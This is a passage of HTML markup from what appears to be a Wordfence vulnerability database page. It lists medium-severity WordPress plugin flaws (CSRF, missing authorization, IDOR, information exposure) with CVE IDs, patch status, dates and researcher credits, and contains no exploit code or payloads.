<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">Event Tickets and Registration</a> <span class="wfvr-software-slug">[event-tickets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76820ffd-5f35-46d0-b54a-2488ee96ee7a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/644e2267-c90b-4517-8ded-f2b7c7ec3d27" target="_blank" rel="noopener">Facturación Electrónica Costa Rica &lt;= 2.0.2 &#8211; Cross-Site Request Forgery to Plugin Settings Update</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9720" target="_blank" rel="noopener noreferrer">							CVE-2026-9720						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/factura-electronica-cr" target="_blank" rel="noopener">Facturación Electrónica Costa Rica</a> <span class="wfvr-software-slug">[factura-electronica-cr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2400719fbf58ba13f3eda25084096ad3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2400719fbf58ba13f3eda25084096ad3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/swat-2" target="_blank" rel="noopener">swat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/644e2267-c90b-4517-8ded-f2b7c7ec3d27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c879566b-8d3b-45aa-91e5-aef1198ef994" target="_blank" rel="noopener">Five Star Restaurant Reservations – WordPress Booking Plugin &lt; 2.7.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15151" target="_blank" rel="noopener noreferrer">							CVE-2026-15151						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restaurant-reservations" target="_blank" rel="noopener">Five Star Restaurant Reservations – WordPress Booking Plugin</a> <span class="wfvr-software-slug">[restaurant-reservations]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/minar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e6fb44cd94cc5b5f1bb5c21077caa672.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e6fb44cd94cc5b5f1bb5c21077caa672"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/minar" target="_blank" rel="noopener">Minar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c879566b-8d3b-45aa-91e5-aef1198ef994" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3ae17c3-9f65-4855-aed6-64d3ccb2ff0b" target="_blank" rel="noopener">Fluent Support – Helpdesk &amp; Customer Support Ticket System &lt; 2.3.1 &#8211; Authenticated (Custom role+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14197" target="_blank" rel="noopener noreferrer">							CVE-2026-14197						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support" target="_blank" rel="noopener">Fluent Support – Helpdesk &amp; Customer Support Ticket System</a> <span class="wfvr-software-slug">[fluent-support]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3ae17c3-9f65-4855-aed6-64d3ccb2ff0b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3bcc8aa-3c2d-4036-bdf5-7042d7aaa5d5" target="_blank" rel="noopener">FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration &lt; 1.95.3 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14938" target="_blank" rel="noopener noreferrer">							CVE-2026-14938						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards" target="_blank" rel="noopener">FluentBoards – Project Management, Task Management, Goal Tracking, Kanban Board, and, Team Collaboration</a> <span class="wfvr-software-slug">[fluent-boards]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/diogo-pinto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b1d1a52889f8e60eb6bb4c2b632399a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1d1a52889f8e60eb6bb4c2b632399a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/diogo-pinto" target="_blank" rel="noopener">Diogo Pinto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3bcc8aa-3c2d-4036-bdf5-7042d7aaa5d5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e5d8419-3dff-45f0-b91b-a9c69f5d3e98" target="_blank" rel="noopener">Frontend File Manager Plugin &lt;= 23.6 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16292" target="_blank" rel="noopener noreferrer">							CVE-2026-16292						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nmedia-user-file-uploader" target="_blank" rel="noopener">Frontend File Manager Plugin</a> <span class="wfvr-software-slug">[nmedia-user-file-uploader]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e5d8419-3dff-45f0-b91b-a9c69f5d3e98" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7184e6d-ae46-4725-b464-b9ccb5d518e1" target="_blank" rel="noopener">FundEngine &lt;= 1.7.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59560" target="_blank" rel="noopener noreferrer">							CVE-2026-59560						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform</a> <span class="wfvr-software-slug">[wp-fundraising-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/78db0fddf357f7207a5574afee653e7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="78db0fddf357f7207a5574afee653e7d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener">Septio Noerdiansyah</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7184e6d-ae46-4725-b464-b9ccb5d518e1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff5889e-b9fd-494f-b25d-78e85e94d34c" target="_blank" rel="noopener">FuseWP &lt;= 1.1.24.2 &#8211; Cross-Site Request Forgery to Sync Rule Status Toggle</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5582" target="_blank" rel="noopener noreferrer">							CVE-2026-5582						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusewp" target="_blank" rel="noopener">FuseWP – WordPress User Sync to Email List &amp; Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.)</a> <span class="wfvr-software-slug">[fusewp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/687b1a67f8c4dd6f731d33a8b3b970d4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="687b1a67f8c4dd6f731d33a8b3b970d4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener">Deadbee</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff5889e-b9fd-494f-b25d-78e85e94d34c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf507de-d003-43f3-9763-f1cff5508685" target="_blank" rel="noopener">Google Review Slider &lt;= 18.4 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66428" target="_blank" rel="noopener noreferrer">							CVE-2026-66428						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">WP Google Review Slider</a> <span class="wfvr-software-slug">[wp-google-places-review-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf507de-d003-43f3-9763-f1cff5508685" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4987b1b1-0356-4bc0-a4d5-b9a07830c0d4" target="_blank" rel="noopener">Insert Headers and Footers Code – HT Script &lt;= 1.1.8 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66474" target="_blank" rel="noopener noreferrer">							CVE-2026-66474						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-headers-and-footers-script" target="_blank" rel="noopener">Insert Headers and Footers Code – HT Script</a> <span class="wfvr-software-slug">[insert-headers-and-footers-script]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4987b1b1-0356-4bc0-a4d5-b9a07830c0d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a420a8b5-e43e-4c0d-86f3-b35f11efdf46" target="_blank" rel="noopener">Jeg Kit for Elementor &lt;= 3.1.1 &#8211; Authenticated (Contributor+) Exposure of Sensitive Information via &#8216;JkitDashboardOption&#8217; Inline Script</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2916" target="_blank" rel="noopener noreferrer">							CVE-2026-2916						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</a> <span class="wfvr-software-slug">[jeg-elementor-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a420a8b5-e43e-4c0d-86f3-b35f11efdf46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adecdae5-2cb9-42f3-befb-3f5dc73ed5dc" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor &lt;= 3.7.8 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66696" target="_blank" rel="noopener noreferrer">							CVE-2026-66696						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</a> <span class="wfvr-software-slug">[kadence-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adecdae5-2cb9-42f3-befb-3f5dc73ed5dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8deef7d-d755-489d-847a-64eecb13f7a6" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes &lt; 10.0.10 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14231" target="_blank" rel="noopener noreferrer">							CVE-2026-14231						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</a> <span class="wfvr-software-slug">[lifterlms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9c1637c1901bf472307fb82f9ffe38a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c1637c1901bf472307fb82f9ffe38a3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener">Daniel Púa &#8211; devploit</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8deef7d-d755-489d-847a-64eecb13f7a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e029624-7fc2-4290-8d54-94b319793d76" target="_blank" rel="noopener">LWS Optimize – All-in-One Speed Booster &amp; Cache Tools &lt; 3.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16042" target="_blank" rel="noopener noreferrer">							CVE-2026-16042						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lws-optimize" target="_blank" rel="noopener">LWS Optimize – All-in-One Speed Booster &amp; Cache Tools</a> <span class="wfvr-software-slug">[lws-optimize]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/omar-elshopky-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba1d2710a853204f30b056c37853fa4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba1d2710a853204f30b056c37853fa4b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/omar-elshopky-2" target="_blank" rel="noopener">Omar Elshopky</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e029624-7fc2-4290-8d54-94b319793d76" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3610f3-d589-4a45-9f80-6b66205de093" target="_blank" rel="noopener">Meta Box &lt; 5.13.1 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
